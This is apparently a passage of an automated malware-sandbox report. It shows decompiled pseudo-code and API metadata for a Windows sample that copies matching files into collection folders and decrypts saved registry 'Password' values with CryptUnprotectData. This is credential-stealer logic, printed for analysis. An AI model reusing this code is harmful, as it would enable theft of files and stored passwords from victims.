                                                                                							_t138 = _t89;
                                                                                							if(_t89 != 0) {
                                                                                								_push(_t126);
                                                                                								_push(_t127 - 0x37c);
                                                                                								_t94 = E0040D337(0, _t127 - 0x360, _t126, _t138);
                                                                                								 *((char*)(_t127 - 4)) = 2;
                                                                                								_t96 = E0040D3C3(_t114, _t127 - 0x398, _t94,  *((intOrPtr*)(_t127 - 0x4dc)));
                                                                                								_t132 = _t130 + 0x14;
                                                                                								_t139 = _t96[0x14] - 0x10;
                                                                                								if(_t96[0x14] >= 0x10) {
                                                                                									_t96 =  *_t96;
                                                                                								}
                                                                                								CreateDirectoryA(_t96, 0);
                                                                                								E00402C34(_t127 - 0x398, 1, 0);
                                                                                								 *((char*)(_t127 - 4)) = 1;
                                                                                								E00402C34(_t127 - 0x37c, 1, 0);
                                                                                								_push(_t126);
                                                                                								_push(_t127 - 0x398);
                                                                                								_t123 = _t127 - 0x360;
                                                                                								_t101 = E0040D337(0, _t127 - 0x360, _t126, _t139);
                                                                                								 *((char*)(_t127 - 4)) = 3;
                                                                                								_t103 = E0040D3C3(_t127 - 0x118, _t127 - 0x37c, _t101, _t127 - 0x118);
                                                                                								_t130 = _t132 + 0x14;
                                                                                								_t140 = _t103[0x14] - 0x10;
                                                                                								if(_t103[0x14] >= 0x10) {
                                                                                									_t103 =  *_t103;
                                                                                								}
                                                                                								CopyFileA(_t127 - 0x220, _t103, 1);
                                                                                								E00402C34(_t127 - 0x37c, 1, 0);
                                                                                								 *((char*)(_t127 - 4)) = 1;
                                                                                								E00402C34(_t127 - 0x398, 1, 0);
                                                                                							}
                                                                                							_t114 =  *((intOrPtr*)(_t127 - 0x4e8));
                                                                                							E00411E67(0,  *((intOrPtr*)(_t127 - 0x4e8)), _t123, _t126, _t140, _t127 - 0x118, _t127 - 0x220,  *(_t127 - 0x4e4));
                                                                                						}
                                                                                					}
                                                                                				} while (FindNextFileA( *(_t127 - 0x4e0), _t127 - 0x4d8) != 0);
                                                                                				FindClose( *(_t127 - 0x4e0));
                                                                                				goto L16;
                                                                                			}




















                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00411E71
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                • __wgetenv.LIBCMT ref: 00411EB9
                                                                                • wsprintfA.USER32 ref: 00411EF4
                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 00411F0B
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 00411F31
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 00411F4B
                                                                                • wsprintfA.USER32 ref: 00411F73
                                                                                • StrCmpCA.SHLWAPI(?,0043E028,?,?,?,?,?,?,?,?,?,key_datas,?,00000001,00000000), ref: 00411F87
                                                                                • wsprintfA.USER32 ref: 00411FA4
                                                                                • wsprintfA.USER32 ref: 00411FB7
                                                                                • PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,key_datas), ref: 00411FCD
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00412012
                                                                                • CopyFileA.KERNEL32 ref: 00412078
                                                                                • FindNextFileA.KERNEL32(?,?,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 004120CA
                                                                                • FindClose.KERNEL32(?,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 004120DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$FileFind$CloseCopyCreateDirectoryFirstH_prolog3H_prolog3_MatchNextPathSpec__wgetenv
                                                                                • String ID: %s\%s$%s\*
                                                                                • API String ID: 3298612795-2848263008
                                                                                • Opcode ID: 00047ea306121a9da46b0d024485842454844f848a4dd9f9760eeb0c3188d97a
                                                                                • Instruction ID: 75291c586b25792165afe358cf1dd12e6fb0959463964a56fb5be4a3dc49025e
                                                                                • Opcode Fuzzy Hash: 00047ea306121a9da46b0d024485842454844f848a4dd9f9760eeb0c3188d97a
                                                                                • Instruction Fuzzy Hash: 6D611FB1900258AFDB25DB60CD89FDE777CBB09304F0040EAB609A2191DB759F98CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E0040895E(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t47;
                                                                                				void* _t52;
                                                                                				void* _t65;
                                                                                				CHAR* _t67;
                                                                                				int _t70;
                                                                                				intOrPtr _t81;
                                                                                				CHAR* _t83;
                                                                                				intOrPtr _t90;
                                                                                				intOrPtr _t98;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                				intOrPtr _t105;
                                                                                				intOrPtr _t114;
                                                                                
                                                                                				_t96 = __edi;
                                                                                				_push(0x4a4);
                                                                                				E004219DE(E0043639C, __ebx, __edi, __esi);
                                                                                				_t47 =  *((intOrPtr*)(_t100 + 0x28));
                                                                                				_t90 =  *((intOrPtr*)(_t100 + 0x24));
                                                                                				 *((intOrPtr*)(_t100 - 0x4ac)) = _t47;
                                                                                				 *(_t100 - 0x4a8) =  *(_t100 + 0x2c);
                                                                                				_t98 = 0;
                                                                                				 *((intOrPtr*)(_t100 - 4)) = 0;
                                                                                				wsprintfA(_t100 - 0x328, "%s\\*", _t47);
                                                                                				_t102 = _t101 + 0xc;
                                                                                				_t52 = FindFirstFileA(_t100 - 0x328, _t100 - 0x4a0);
                                                                                				 *(_t100 - 0x4a4) = _t52;
                                                                                				if(_t52 == 0xffffffff) {
                                                                                					L15:
                                                                                					E00402C34(_t100 + 8, 1, _t98);
                                                                                					return E00421A61(_t90, _t96, _t98);
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_push(".");
                                                                                					_push(_t100 - 0x474);
                                                                                					if( *0x44a1d8() != 0) {
                                                                                						_push("..");
                                                                                						_push(_t100 - 0x474);
                                                                                						if( *0x44a1d8() != 0) {
                                                                                							_t96 = "%s\\%s";
                                                                                							wsprintfA(_t100 - 0x220, _t96,  *((intOrPtr*)(_t100 - 0x4ac)), _t100 - 0x474);
                                                                                							_t103 = _t102 + 0x10;
                                                                                							_t65 =  *0x44a1d8(_t90, 0x43e028);
                                                                                							_push(_t100 - 0x474);
                                                                                							_t67 = _t100 - 0x118;
                                                                                							if(_t65 != 0) {
                                                                                								wsprintfA(_t67, _t96, _t90);
                                                                                								_t104 = _t103 + 0x10;
                                                                                							} else {
                                                                                								wsprintfA(_t67, "%s");
                                                                                								_t104 = _t103 + 0xc;
                                                                                							}
                                                                                							_t70 = PathMatchSpecA(_t100 - 0x474,  *(_t100 - 0x4a8));
                                                                                							_t111 = _t70;
                                                                                							if(_t70 != 0) {
                                                                                								_push(_t90);
                                                                                								_push(_t100 - 0x360);
                                                                                								_t96 = _t100 + 8;
                                                                                								E0040D337(_t90, _t100 + 8, _t98, _t111);
                                                                                								_push(_t100 - 0x118);
                                                                                								_push(_t100 - 0x344);
                                                                                								 *((char*)(_t100 - 4)) = 1;
                                                                                								E0040D337(_t90, _t100 + 8, _t98, _t111);
                                                                                								_t104 = _t104 + 0x10;
                                                                                								 *((char*)(_t100 - 4)) = 2;
                                                                                								_t112 =  *((intOrPtr*)(_t100 - 0x34c)) - 0x10;
                                                                                								_t81 =  *((intOrPtr*)(_t100 - 0x360));
                                                                                								if( *((intOrPtr*)(_t100 - 0x34c)) < 0x10) {
                                                                                									_t81 = _t100 - 0x360;
                                                                                								}
                                                                                								_push(_t81);
                                                                                								E004088DB(_t90, _t96, _t98, _t112);
                                                                                								_t83 =  *(_t100 - 0x344);
                                                                                								if( *((intOrPtr*)(_t100 - 0x330)) < 0x10) {
                                                                                									_t83 = _t100 - 0x344;
                                                                                								}
                                                                                								CopyFileA(_t100 - 0x220, _t83, 1);
                                                                                								 *0x44a338 =  *0x44a338 + 1;
                                                                                								_t114 =  *0x44a338;
                                                                                								E00402C34(_t100 - 0x344, 1, _t98);
                                                                                								 *((char*)(_t100 - 4)) = 0;
                                                                                								E00402C34(_t100 - 0x360, 1, _t98);
                                                                                							}
                                                                                							_push( *(_t100 - 0x4a8));
                                                                                							_push(_t100 - 0x220);
                                                                                							_push(_t100 - 0x118);
                                                                                							_t105 = _t104 - 0x1c;
                                                                                							 *((intOrPtr*)(_t100 - 0x4b0)) = _t105;
                                                                                							E0040410F(_t105, _t100 + 8);
                                                                                							E0040895E(_t90, _t96, _t105, _t114);
                                                                                							_t102 = _t105 + 0x28;
                                                                                							_t98 = 0;
                                                                                						}
                                                                                					}
                                                                                				} while (FindNextFileA( *(_t100 - 0x4a4), _t100 - 0x4a0) != 0);
                                                                                				FindClose( *(_t100 - 0x4a4));
                                                                                				goto L15;
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf$FileFind$CloseCopyFirstH_prolog3_MatchNextPathSpec
                                                                                • String ID: %s\%s$%s\*
                                                                                • API String ID: 1082190125-2848263008
                                                                                • Opcode ID: b11cad1dccdafe5c3db91d0ae713c377eb21691d999184cee17981fd547f3a6e
                                                                                • Instruction ID: 051fd0e55c7d2c1ce1bf46136d8f65435a4ce218a127611a820740890cc1747d
                                                                                • Opcode Fuzzy Hash: b11cad1dccdafe5c3db91d0ae713c377eb21691d999184cee17981fd547f3a6e
                                                                                • Instruction Fuzzy Hash: 4E514DB1940218ABDB25EB60CD89FDA777CEF09314F0001EAF649A2181DB759B948F5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E004032BE(void* __ebx, char* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t97;
                                                                                				intOrPtr _t111;
                                                                                				intOrPtr* _t112;
                                                                                				intOrPtr _t116;
                                                                                				signed int _t118;
                                                                                				void* _t119;
                                                                                				signed int _t130;
                                                                                				intOrPtr* _t134;
                                                                                				intOrPtr _t139;
                                                                                				intOrPtr* _t142;
                                                                                				intOrPtr _t148;
                                                                                				intOrPtr* _t153;
                                                                                				long _t162;
                                                                                				void* _t163;
                                                                                				signed int _t164;
                                                                                				intOrPtr _t170;
                                                                                				signed int _t173;
                                                                                				intOrPtr _t176;
                                                                                				intOrPtr _t180;
                                                                                				intOrPtr _t181;
                                                                                				void* _t186;
                                                                                				signed int _t187;
                                                                                				signed int _t188;
                                                                                				signed int _t189;
                                                                                				void* _t193;
                                                                                				signed int* _t195;
                                                                                				void* _t196;
                                                                                				signed int _t197;
                                                                                				void* _t199;
                                                                                				void* _t200;
                                                                                				void* _t202;
                                                                                
                                                                                				_t200 = _t199 - 0xc44;
                                                                                				_t197 = _t200 - 4;
                                                                                				_t97 =  *0x447674; // 0x4124c941
                                                                                				 *(_t197 + 0xc44) = _t97 ^ _t197;
                                                                                				_push(0x38);
                                                                                				E00421975(E004368AC, __ebx, __edi, __esi);
                                                                                				_t195 =  *(_t197 + 0xc50);
                                                                                				_t162 = 0;
                                                                                				 *(_t197 - 0x2c) = 0;
                                                                                				 *((intOrPtr*)(_t197 - 0x28)) = __edx;
                                                                                				 *(_t197 - 0x44) = _t195;
                                                                                				 *(_t197 - 0x14) = 0x80000001;
                                                                                				 *_t195 = 0;
                                                                                				_t195[1] = 0;
                                                                                				_t195[2] = 0;
                                                                                				 *(_t197 - 4) = 0;
                                                                                				 *((intOrPtr*)(__edx)) = 0;
                                                                                				_t184 = _t197 - 0x14;
                                                                                				 *(_t197 - 0x2c) = 1;
                                                                                				if(RegOpenKeyExA(0x80000001, __ecx, 0, 0x20019, _t197 - 0x14) != 0) {
                                                                                					L34:
                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
                                                                                					_pop(_t186);
                                                                                					_pop(_t196);
                                                                                					_pop(_t163);
                                                                                					return E0041DEB4(_t195, _t163,  *(_t197 + 0xc44) ^ _t197, _t184, _t186, _t196);
                                                                                				}
                                                                                				_push(_t197 - 0x10);
                                                                                				_push(_t197 + 0x844);
                                                                                				_push(_t197 - 0x1c);
                                                                                				_push(0);
                                                                                				_push(_t197 - 0x20);
                                                                                				_push(_t197 + 0x444);
                                                                                				 *((intOrPtr*)(_t197 - 0x18)) = 0;
                                                                                				 *(_t197 - 0x20) = 0xff;
                                                                                				 *((intOrPtr*)(_t197 - 0x1c)) = 3;
                                                                                				 *((char*)(_t197 + 0x444)) = 0;
                                                                                				_push(0);
                                                                                				while(RegEnumValueA( *(_t197 - 0x14), ??, ??, ??, ??, ??, ??, ??) == 0) {
                                                                                					_t111 = 0xf;
                                                                                					 *((intOrPtr*)(_t197 + 0x18)) = _t111;
                                                                                					 *(_t197 + 0x14) = _t162;
                                                                                					 *(_t197 + 4) = _t162;
                                                                                					 *((intOrPtr*)(_t197 + 0x34)) = _t111;
                                                                                					 *(_t197 + 0x30) = _t162;
                                                                                					 *(_t197 + 0x20) = _t162;
                                                                                					_t112 = _t197 + 0x444;
                                                                                					 *(_t197 - 4) = 1;
                                                                                					_t187 = _t112 + 1;
                                                                                					do {
                                                                                						_t170 =  *_t112;
                                                                                						_t112 = _t112 + 1;
                                                                                						__eflags = _t170 - _t162;
                                                                                					} while (__eflags != 0);
                                                                                					E00403A16(_t197 + 4, __eflags, _t197 + 0x444, _t112 - _t187);
                                                                                					_t116 =  *((intOrPtr*)(_t197 - 0x1c));
                                                                                					 *_t197 = _t116;
                                                                                					 *(_t197 + 0x3c) =  *(_t197 - 0x10);
                                                                                					__eflags = _t116 - 3;
                                                                                					if(_t116 != 3) {
                                                                                						__eflags = _t116 - 1;
                                                                                						if(_t116 != 1) {
                                                                                							__eflags = _t116 - 4;
                                                                                							if(_t116 == 4) {
                                                                                								 *((intOrPtr*)(_t197 + 0x40)) =  *((intOrPtr*)(_t197 + 0x844));
                                                                                							}
                                                                                							L21:
                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x28)))) =  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x28)))) + 1;
                                                                                							_t173 = _t195[1];
                                                                                							_t118 = _t197;
                                                                                							__eflags = _t118 - _t173;
                                                                                							if(_t118 >= _t173) {
                                                                                								L27:
                                                                                								__eflags = _t173 - _t195[2];
                                                                                								if(_t173 == _t195[2]) {
                                                                                									E0040399D(_t162, _t187, _t195);
                                                                                								}
                                                                                								_t119 = _t195[1];
                                                                                								 *(_t197 - 0x30) = _t119;
                                                                                								 *(_t197 - 0x24) = _t119;
                                                                                								 *(_t197 - 4) = 3;
                                                                                								__eflags = _t119 - _t162;
                                                                                								if(__eflags == 0) {
                                                                                									L32:
                                                                                									_t195[1] = _t195[1] + 0x44;
                                                                                									_t81 = _t197 - 0x18;
                                                                                									 *_t81 =  *((intOrPtr*)(_t197 - 0x18)) + 1;
                                                                                									__eflags =  *_t81;
                                                                                									 *(_t197 - 0x20) = 0x400;
                                                                                									 *(_t197 - 0x10) = 0x400;
                                                                                									 *(_t197 - 4) = _t162;
                                                                                									E00402C34(_t197 + 0x20, 1, _t162);
                                                                                									E00402C34(_t197 + 4, 1, _t162);
                                                                                									_push(_t197 - 0x10);
                                                                                									_push(_t197 + 0x844);
                                                                                									_push(_t197 - 0x1c);
                                                                                									_push(_t162);
                                                                                									_push(_t197 - 0x20);
                                                                                									_push(_t197 + 0x444);
                                                                                									_push( *((intOrPtr*)(_t197 - 0x18)));
                                                                                									continue;
                                                                                								} else {
                                                                                									_t164 = _t197;
                                                                                									L31:
                                                                                									_push(_t119);
                                                                                									E004040CA(_t164, _t173, _t187, _t195, __eflags);
                                                                                									_t162 = 0;
                                                                                									__eflags = 0;
                                                                                									goto L32;
                                                                                								}
                                                                                							}
                                                                                							_t184 =  *_t195;
                                                                                							__eflags = _t184 - _t118;
                                                                                							if(_t184 > _t118) {
                                                                                								goto L27;
                                                                                							}
                                                                                							_t130 = _t118 - _t184;
                                                                                							asm("cdq");
                                                                                							_t188 = 0x44;
                                                                                							_t184 = _t130 % _t188;
                                                                                							_t189 = _t130 / _t188;
                                                                                							__eflags = _t173 - _t195[2];
                                                                                							if(_t173 == _t195[2]) {
                                                                                								E0040399D(_t162, _t189, _t195);
                                                                                							}
                                                                                							_t119 = _t195[1];
                                                                                							_t187 = _t189 * 0x44 +  *_t195;
                                                                                							 *(_t197 - 0x24) = _t119;
                                                                                							 *(_t197 - 0x30) = _t119;
                                                                                							 *(_t197 - 4) = 2;
                                                                                							__eflags = _t119 - _t162;
                                                                                							if(__eflags == 0) {
                                                                                								goto L32;
                                                                                							} else {
                                                                                								_t164 = _t187;
                                                                                								goto L31;
                                                                                							}
                                                                                						}
                                                                                						_t134 = _t197 + 0x844;
                                                                                						_t184 = _t134 + 1;
                                                                                						do {
                                                                                							_t176 =  *_t134;
                                                                                							_t134 = _t134 + 1;
                                                                                							__eflags = _t176 - _t162;
                                                                                						} while (__eflags != 0);
                                                                                						L18:
                                                                                						E00403A16(_t197 + 0x20, __eflags, _t197 + 0x844, _t134 - _t184);
                                                                                						goto L21;
                                                                                					}
                                                                                					_t139 = E0041E5C0(_t197 + 0x444, "Password");
                                                                                					__eflags = _t139;
                                                                                					if(_t139 == 0) {
                                                                                						E00404050(_t197 + 0x844, "%S", _t197 + 0x844);
                                                                                						_t142 = _t197 + 0x844;
                                                                                						_t200 = _t200 + 0xc;
                                                                                						_t184 = _t142 + 1;
                                                                                						do {
                                                                                							_t180 =  *_t142;
                                                                                							_t142 = _t142 + 1;
                                                                                							__eflags = _t180 - _t162;
                                                                                						} while (__eflags != 0);
                                                                                						goto L18;
                                                                                					}
                                                                                					 *(_t197 - 0x24) = HeapAlloc(GetProcessHeap(), 8, 0x400);
                                                                                					 *((intOrPtr*)(_t197 - 0x3c)) = _t197 + 0x845;
                                                                                					 *((intOrPtr*)(_t197 - 0x40)) =  *(_t197 - 0x10) - 1;
                                                                                					_t148 =  *0x44a130(_t197 - 0x40, _t162, _t162, _t162, _t162, 1, _t197 - 0x38);
                                                                                					__eflags = _t148;
                                                                                					if(_t148 == 0) {
                                                                                						_t193 = 0x43e028;
                                                                                					} else {
                                                                                						_t193 =  *(_t197 - 0x24);
                                                                                						WideCharToMultiByte(_t162, _t162,  *(_t197 - 0x34),  *(_t197 - 0x38), _t193, 0x400, _t162, _t162);
                                                                                						LocalFree( *(_t197 - 0x34));
                                                                                					}
                                                                                					E0041E985(_t197 + 0x44, 0x400, _t193);
                                                                                					_t202 = _t200 + 0xc;
                                                                                					HeapFree(GetProcessHeap(), _t162, _t193);
                                                                                					_t153 = _t197 + 0x44;
                                                                                					_t187 = _t153 + 1;
                                                                                					do {
                                                                                						_t181 =  *_t153;
                                                                                						_t153 = _t153 + 1;
                                                                                						__eflags = _t181 - _t162;
                                                                                					} while (__eflags != 0);
                                                                                					E00403A16(_t197 + 0x20, __eflags, _t197 + 0x44, _t153 - _t187);
                                                                                					E0041E985(_t197 + 0x44, 0x400, 0x43e028);
                                                                                					_t200 = _t202 + 0xc;
                                                                                					goto L21;
                                                                                				}
                                                                                				goto L34;
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004032DD
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,00000038), ref: 0040331B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,00000000,00020019,?,00000038), ref: 004033D9
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00020019,?,00000038), ref: 004033E0
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00403404
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000,?,00000000,00020019,?,00000038), ref: 00403421
                                                                                • LocalFree.KERNEL32(?,?,00000000,00020019,?,00000038), ref: 0040342A
                                                                                • _strcpy_s.LIBCMT ref: 00403441
                                                                                • GetProcessHeap.KERNEL32(00000000,0043E028,00020019,?,00000038), ref: 0040344B
                                                                                • HeapFree.KERNEL32(00000000), ref: 00403452
                                                                                • _strcpy_s.LIBCMT ref: 00403482
                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?,00000038), ref: 0040359F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeProcess_strcpy_s$AllocByteCharCryptDataEnumH_prolog3LocalMultiOpenUnprotectValueWide
                                                                                • String ID: (C$Password
                                                                                • API String ID: 597719749-923554978
                                                                                • Opcode ID: 460eef4d82618387a12e90021518f6bffe0c491f5f20d6a402ed9ac21f6ff259
                                                                                • Instruction ID: 2c51c7e4318fc76dc8eab74b4b971b5b9e7f47f053030457f5226b6cb3d33774
                                                                                • Opcode Fuzzy Hash: 460eef4d82618387a12e90021518f6bffe0c491f5f20d6a402ed9ac21f6ff259
                                                                                • Instruction Fuzzy Hash: B9A171B1900249AFDB21DF95CD84BEE7BFCFB48304F10452AE949E7291D778AA04CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E00408B6B(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
                                                                                				intOrPtr _t52;
                                                                                				void* _t57;
                                                                                				void* _t67;
                                                                                				void* _t72;
                                                                                				void* _t73;
                                                                                				void* _t75;
                                                                                				void* _t82;
                                                                                				intOrPtr _t86;
                                                                                				CHAR* _t88;
                                                                                				void* _t115;
                                                                                				void* _t116;
                                                                                				void* _t117;
                                                                                
                                                                                				_t114 = __esi;
                                                                                				_t110 = __edi;
                                                                                				_push(0x408);
                                                                                				E004219DE(E00436356, __ebx, __edi, __esi);
                                                                                				_t52 =  *((intOrPtr*)(_t115 + 0x40));
                                                                                				 *((intOrPtr*)(_t115 - 0x414)) = _t52;
                                                                                				 *((intOrPtr*)(_t115 - 0x410)) = __ecx;
                                                                                				 *((intOrPtr*)(_t115 - 4)) = 1;
                                                                                				wsprintfA(_t115 - 0x118, "%s\\*", _t52);
                                                                                				_t117 = _t116 + 0xc;
                                                                                				_t57 = FindFirstFileA(_t115 - 0x118, _t115 - 0x408);
                                                                                				 *(_t115 - 0x40c) = _t57;
                                                                                				if(_t57 == 0xffffffff) {
                                                                                					L11:
                                                                                					E00402C34(_t115 + 8, 1, 0);
                                                                                					E00402C34(_t115 + 0x24, 1, 0);
                                                                                					return E00421A61(1, _t110, _t114);
                                                                                				}
                                                                                				_t114 = "\\";
                                                                                				do {
                                                                                					_push(".");
                                                                                					_push(_t115 - 0x3dc);
                                                                                					if( *0x44a1d8() != 0) {
                                                                                						_t67 =  *0x44a1d8(_t115 - 0x3dc, "..");
                                                                                						_t122 = _t67;
                                                                                						if(_t67 != 0) {
                                                                                							wsprintfA(_t115 - 0x220, "%s\\%s",  *((intOrPtr*)(_t115 - 0x414)), _t115 - 0x3dc);
                                                                                							_push("\\Soft\\");
                                                                                							_push(_t115 - 0x2ac);
                                                                                							_t72 = E0040D337(1, _t115 + 0x24, _t114, _t122);
                                                                                							 *((char*)(_t115 - 4)) = 2;
                                                                                							_t73 = E0040D39B(_t72, _t72, _t115 - 0x2c8, _t115 + 8);
                                                                                							 *((char*)(_t115 - 4)) = 3;
                                                                                							_t75 = E0040D3C3(_t72, _t115 - 0x274, _t73, _t114);
                                                                                							 *((char*)(_t115 - 4)) = 4;
                                                                                							E0040D3C3(_t72, _t115 - 0x23c, _t75,  *((intOrPtr*)(_t115 - 0x410)));
                                                                                							E00402C34(_t115 - 0x274, 1, 0);
                                                                                							E00402C34(_t115 - 0x2c8, 1, 0);
                                                                                							 *((char*)(_t115 - 4)) = 8;
                                                                                							E00402C34(_t115 - 0x2ac, 1, 0);
                                                                                							_push(_t114);
                                                                                							_push(_t115 - 0x290);
                                                                                							_t82 = E0040D337(1, _t115 - 0x23c, _t114, _t122);
                                                                                							 *((char*)(_t115 - 4)) = 9;
                                                                                							E0040D3C3(_t115 - 0x3dc, _t115 - 0x258, _t82, _t115 - 0x3dc);
                                                                                							_t117 = _t117 + 0x4c;
                                                                                							_t110 = 0;
                                                                                							 *((char*)(_t115 - 4)) = 0xb;
                                                                                							E00402C34(_t115 - 0x290, 1, 0);
                                                                                							_t123 =  *((intOrPtr*)(_t115 - 0x228)) - 0x10;
                                                                                							_t86 =  *((intOrPtr*)(_t115 - 0x23c));
                                                                                							if( *((intOrPtr*)(_t115 - 0x228)) < 0x10) {
                                                                                								_t86 = _t115 - 0x23c;
                                                                                							}
                                                                                							_push(_t86);
                                                                                							E004088DB(1, _t110, _t114, _t123);
                                                                                							_t88 =  *(_t115 - 0x258);
                                                                                							if( *((intOrPtr*)(_t115 - 0x244)) < 0x10) {
                                                                                								_t88 = _t115 - 0x258;
                                                                                							}
                                                                                							CopyFileA(_t115 - 0x220, _t88, 1);
                                                                                							 *0x44a338 =  *0x44a338 + 1;
                                                                                							E00402C34(_t115 - 0x258, 1, _t110);
                                                                                							 *((char*)(_t115 - 4)) = 1;
                                                                                							E00402C34(_t115 - 0x23c, 1, _t110);
                                                                                						}
                                                                                					}
                                                                                				} while (FindNextFileA( *(_t115 - 0x40c), _t115 - 0x408) != 0);
                                                                                				FindClose( *(_t115 - 0x40c));
                                                                                				goto L11;
                                                                                			}
















                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00408B75
                                                                                • wsprintfA.USER32 ref: 00408B9C
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00408BB3
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 00408BD9
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 00408BF3
                                                                                • wsprintfA.USER32 ref: 00408C1A
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • CopyFileA.KERNEL32 ref: 00408D1E
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00408D54
                                                                                • FindClose.KERNEL32(?), ref: 00408D68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$wsprintf$CloseCopyFirstH_prolog3H_prolog3_Next_memmove
                                                                                • String ID: %s\%s$%s\*$\Soft\
                                                                                • API String ID: 3482278095-1410843534
                                                                                • Opcode ID: 399c040569c5708c3e77376a15312cdfd02956043a70641d1904fe30aad0dbae
                                                                                • Instruction ID: 093ded11f7476e5d6d2f9204ca064d014effbcdec827b671122684dcae828282
                                                                                • Opcode Fuzzy Hash: 399c040569c5708c3e77376a15312cdfd02956043a70641d1904fe30aad0dbae
                                                                                • Instruction Fuzzy Hash: AA5181B180115CABDB25DBA5CD89FCE777CAF14304F0045EAB509B2191DB785B88CF29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E00406FE6(void* __ebx, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				struct _SYSTEMTIME _v560;
                                                                                				signed char _v561;
                                                                                				signed char _v562;
